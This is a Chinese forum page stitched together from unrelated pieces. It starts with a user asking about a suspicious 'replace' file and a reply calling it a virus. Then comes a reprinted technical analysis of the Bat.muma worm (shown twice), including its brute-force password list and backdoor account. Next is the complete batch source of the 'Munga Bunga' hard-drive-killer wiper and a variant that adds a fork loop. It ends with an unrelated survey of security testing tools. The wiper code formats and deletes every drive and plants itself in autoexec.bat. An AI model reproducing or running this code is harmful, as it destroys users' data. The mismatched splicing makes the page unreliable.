d盘replace这是个什么文件
看来就是病毒,用杀毒软件杀一下,
以下是一些可能是病毒的相关资料:
迅猛蠕虫“姆玛”(Bat.muma)技术分析报告
-----------------------------------------------------------------------------
(2003-06-05 19:50) 文章来源: 金山毒霸安全资讯网
病毒名称:Bat.muma
病毒类型:蠕虫
危害级别:中
传播速度:高
技术特征:
该病毒采用批处理命令编写,并携带端口扫描工具,通过暴力破解被攻击的计算机超级用户密码,进行疯狂传播。
病毒行为:
1。病毒可能复制以下文件到系统目录
10.bat
hack.bat
hfind.exe
ipc.bat
muma.bat
near.bat
ntservice.bat
ntservice.exe
NTService.ini
nwiz.exe
nwiz.in_
nwiz.ini
ipcpass.txt
tihuan.txt
rep.exe
psexec.exe
random.bat
replace.bat
ss.bat
start.bat
pcmsg.dll
2。病毒由Start.bat开始运行。这个批处理程序会调用其它批处理程序去完成传
染;
3。病毒会搜索从C:到H:盘中\MU目录以及其子目录下的所有文件,并把文件名保
存在LAN.LOG文件中。当被搜索的文件名中包含“MU”字符串时,nwiz.exe将被执行,nw
iz.exe根据nwiz.ini和nwiz.in_文件对病毒中的字符串进行简单的加密。这个搜索过程
完成后,LAN.LOG会被删除;
4。删除ipcfind.txt文件,调HFind.exe进行 *** 扫描,搜索 *** 中的计算机。并
试图使用以下的密码去破解被攻击的计算机。可能的密码是:
password
passwd
admin
pass
123
1234
12345
123456
密码为空
5。被HFind.exe破解成功的计算机,会被病毒将上述的所有文件通过管理员文件共
享方式拷贝到其系统目录下。对于Windows NT、Windows200系统是C:\winnt\system32目
录,对于WindowsXP系统是C:\winnt\system32或C:\Windows\system32目录,对于Win9X是
C:\windows\system目录;
6。传染成功后,病毒会用Psexec.exe程序远程启动被感染计算机上的Start.bat,
从而使病毒在被感染的计算机上激活;
7。调用系统程序netstat.exe,然后运行Near.bat从netstat的输出信息中获得更
多的IP,并对这些IP进行攻击;
8。ss.bat创建或者修改系统中的admin用户,并设置其它密码为:KKKKKKK。为被
攻击计算机留下一个后门。
9。利用ntservice.bat调用ntservice.exe为自己注册一个名为"Application"的系
统服务,保证自己能在每次系统重启时被激活。
Bat.Worm.Muma能干吗?
那个是病毒,该病毒采用批处理命令编写,并携带端口扫描工具,通过暴力破解被攻击的计算机超级用户Frethem/index.htm" target="_blank" style='text-decoration: underline;color: #0000FF'密码,进行疯狂传播。病毒由Start.bat开始运行。这个批处理程序会调用其它批处理程序去完成传染;
3、病毒会搜索从C:到H:盘中\MU目录以及其了目录下的所有文件,并把文件名保存在LAN.LOG文件中。当被搜索的文件名中包含“MU”字符串时,nwiz.exe将被执行,nwiz.exe根据nwiz.ini和nwiz.in_文件对病毒中的字符串进行简单的加密。这个搜索过程完成后,LAN.LOG会被删除;
4、删除ipcfind.txt文件,调HFind.exe进行 *** 扫描,搜索 *** 中的计算机。并试图使用以下的密码去破解被攻击的计算机。可能的密码是:
password
passwd
admin
pass
123
1234
12345
123456
密码为空
5、被HFind.exe破解成功的计算机,会被病毒将上述的所有文件通过管理员文件共享方式拷贝到其系统目录下。对于Windows
NT、Windows200系统是C:\winnt\system32目录,对于WindowsXP系统是C:\winnt\system32或C:\Windows\system32目录,对于Win9X是C:\windows\system目录;
6、传染成功后,病毒会用Psexec.exe程序远程启动被感染计算机上的Start.bat,从而使病毒在被感染的计算机上激活;
7、调用系统程序netstat.exe,然后运行Near.bat从netstat的输出信息中获得更多的IP,并对这些IP进行攻击;
8、ss.bat创建或者修改系统中的admin用户,并设置其它密码为:KKKKKKK。为被攻击计算机留下一个后门。
9、利用ntservice.bat调用ntservice.exe为自己注册一个名为"Application"的系统服务,保证自己能在每次系统重启时被激活。
最近有变异的
原病毒源代码:@echo off
rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:autoexec.bat nul
echo @echo off c:autoexec.bat
echo call format c: /q /u /autoSample nul c:autoexec.bat
call attrib +r +h c:autoexec.bat nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don't worry about how it
rem works, it's d*amn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.
echo @echo off drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" nul {t}.bat
%comspec% /e:2048 /c {t}.bat drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem When errorlevel is 1, then the above is not true, if 0, then it's true.
rem Opposite of binary rules. If 0, it will elaps to the next command.
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" nul {t}.bat
%comspec% /e:2048 /c {t}.bat drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
rem if errorlevel is 0, then it will elaps to the next command.
echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" nul {t}.bat
%comspec% /e:2048 /c {t}.bat drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.
echo :enddc drivechk.bat
rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".
rem Now we will use the program drivechk.bat to attain valid drive information.
:Sampledrv
for %%a in (%alldrive%) do call drivechk.bat %%a nul
del drivechk.bat nul
if %drive.==. set drive=c
:form_del
call attrib -r -h c:autoexec.bat nul
echo @echo off c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat
echo cls c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat
echo cls c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat
echo cls c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat
echo cls c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat
echo cls c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat
echo cd c:autoexec.bat
echo cls c:autoexec.bat
echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. c:autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . c:autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. c:autoexec.bat
echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! c:autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. c:autoexec.bat
echo echo 4. Don't support the following: War, Raci *** , Drugs and the Liberal Party.c:autoexec.bat
echo echo. c:autoexec.bat
echo echo Regards, c:autoexec.bat
echo echo. c:autoexec.bat
echo echo Munga Bunga c:autoexec.bat
call attrib +r +h c:autoexec.bat
:makedir
if exist c:temp.bat attrib -r -h c:temp.bat nul
echo @echo off c:temp.bat
echo %%1: c:temp.bat
echo cd c:temp.bat
echo :startmd c:temp.bat
echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a c:temp.bat
echo for %%%%a in ("ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! c:temp.bat
echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd c:temp.bat
call attrib +r +h c:temp.bat nul
cls
echo Initializing Variables . . .
rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autoSample nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a: /S nul
call attrib +r +h c:temp.bat nul
call attrib +r +h c:autoexec.bat nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
for %%a in (%drive%) call deltree /y %%a:*. nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga nul
cls
echo Thank you for using a Munga Bunga product.
echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.
echo.
echo Here is a joke for you . . .
echo.
echo Q). What's the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo HAHAHAHA, get it? Don't you just love that one?
echo.
echo Regards,
echo.
echo Munga Bunga
变异病毒源代码:@echo off
rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:autoexec.bat nul
echo @echo off c:autoexec.bat
echo call format c: /q /u /autoSample nul c:autoexec.bat
call attrib +r +h c:autoexec.bat nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don't worry about how it
rem works, it's d*amn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.
echo @echo off drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" nul {t}.bat
%comspec% /e:2048 /c {t}.bat drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem When errorlevel is 1, then the above is not true, if 0, then it's true.
rem Opposite of binary rules. If 0, it will elaps to the next command.
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" nul {t}.bat
%comspec% /e:2048 /c {t}.bat drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
rem if errorlevel is 0, then it will elaps to the next command.
echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" nul {t}.bat
%comspec% /e:2048 /c {t}.bat drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.
echo :enddc drivechk.bat
rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".
rem Now we will use the program drivechk.bat to attain valid drive information.
:Sampledrv
for %%a in (%alldrive%) do call drivechk.bat %%a nul
del drivechk.bat nul
if %drive.==. set drive=c
:form_del
call attrib -r -h c:autoexec.bat nul
echo @echo off c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat
echo cls c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat
echo cls c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat
echo cls c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat
echo cls c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat
echo cls c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat
echo cd c:autoexec.bat
echo cls c:autoexec.bat
echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. c:autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . c:autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. c:autoexec.bat
echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! c:autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. c:autoexec.bat
echo echo 4. Don't support the following: War, Raci *** , Drugs and the Liberal Party.c:autoexec.bat
echo echo. c:autoexec.bat
echo echo Regards, c:autoexec.bat
echo echo. c:autoexec.bat
echo echo Munga Bunga c:autoexec.bat
call attrib +r +h c:autoexec.bat
:makedir
if exist c:temp.bat attrib -r -h c:temp.bat nul
echo @echo off c:temp.bat
echo %%1: c:temp.bat
echo cd c:temp.bat
echo :startmd c:temp.bat
echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a c:temp.bat
echo for %%%%a in ("ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! c:temp.bat
echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd c:temp.bat
call attrib +r +h c:temp.bat nul
cls
echo Initializing Variables . . .
rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autoSample nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a: /S nul
call attrib +r +h c:temp.bat nul
call attrib +r +h c:autoexec.bat nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
for %%a in (%drive%) call deltree /y %%a:*. nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga nul
cls
echo Thank you for using a Munga Bunga product.
echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.
echo.
echo Here is a joke for you . . .
echo.
echo Q). What's the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo HAHAHAHA, get it? Don't you just love that one?
echo.
echo Regards,
echo.
echo Munga Bunga
echo You got it!!
:a
start cmd.exe
start %0
goto a
更受欢迎的软件安全性测试工具有哪些?
之前在做 国内软件测试现状调查 之时,因为安全性测试工具太多,结果显示其分布比较广,填写“其它”占的比重很高(66%),为此专门做了一个调查 ,虽然收集的有效反馈不多(不到100),但基本反映了测试工具的使用现状。
1. 从总体看,(静态的)代码分析工具和(动态的)渗透测试工具应用还是比较普遍 ,超过60%,而且渗透测试工具(73.68%)略显优势,高出10%。模糊测试工具,可能大家感觉陌生,低至16%,但它在安全性、可靠性测试中还是能发挥作用的。从理论上看,代码分析工具应该能达到95%以上,因为它易用,且安全性已经是许多公司的红线,得到足够重视。 希望以后各个公司能够加强代码分析工具和模糊测试工具的应用。
2. Java代码安全性分析工具前三名是 : IBM AppScan Source Edition(42.11%)、Fotify Static Code Analyzer(36.84%)、Findbugs(26.32%) ,而JTest、PMD等没进入前三名,虽然和第3名差距不大,只有5%左右。也有公司使用Checkmarx,不在此调查中。Coverity也支持Java,可能Java的开源工具较多,人们很少用它。
3. C/C++代码安全性分析工具前三名是 : C++Test(38.89%)、IBM AppScan Source Edition(38.89%)、Fotify Static Code Analyzer(27.78%)、Visual Studio(27.78%) 。Coverity、CppCheck、LDRA Testbed 没能进入前三名,可能LDRA Testbed比较贵,关键的嵌入式软件采用比较多,而Coverity Cloud针对Github等上面的代码有免费服务(),大家可以尝试应用。
4. JavaScript代码安全性分析工具应用最多的是 Google's Closure Compiler,其次是 *** Hint,也有的公司用Coverity来进行 *** 的代码分析。
5. Python代码安全性分析工具应用最多的是Pychecker ,其次是PyCharm,而Pylint使用比较少,也有几个公司用Coverity来进行Python的代码分析。
6. Web应用安全性测试的商用工具中,IBM AppScan异军突起 ,高达70%的市场,其它商用工具无法与它抗衡,第2名SoapUI和它差距在50%以上,HP webInspect 不到10%。
7. Web应用安全性测试的开源工具中,Firebug明显领先 ,将近50%,比第2名OWASP ZAP高12%,第三名是Firefox Web Developer Tools,超过了20%。
8. Android App的安全性测试工具中,Android Tamer领先 ,将近30%,比第2、3名AndroBugs、Mobisec、Santoku高15%左右。也有用其它不在调查项中的工具,总体看,Android App安全性测试工具分布比较散。
9. *** 状态监控与分析工具中,Wireshark遥遥领先,超过70%。 其次就是Tcpdump、Burp Suite,占30%左右。 *** 状态监控与分析工具挺多的,但从这次调查看,越来越集中到几个工具中,特别是Wireshark功能强,覆盖的协议比较多,深受欢迎。
10. SQL注入测试工具排在前三位的:SQLInjector、SQL Power Injector、OWASP SQLiX, 三者比较接近,差距在6%左右。其它两项工具Pangolin、SQLSqueal也占了10%,而Antonio Parata、Blind SQL Injections、Bsqlbf-v2、Multiple DBMS Sql Injection、Sqlninja几乎没什么人用。
安全性测试工具很多,还包括黑客常用的一些工具,如暴力破解口令工具、端口扫描工具、防火墙渗透工具、渗透测试平台等。从某种意义看,它们超出软件范畴,更多属于 *** 空间安全、密码学等范畴,在此就不展开了。概括起来更受欢迎的软件安全性测试工具有:
0条大神的评论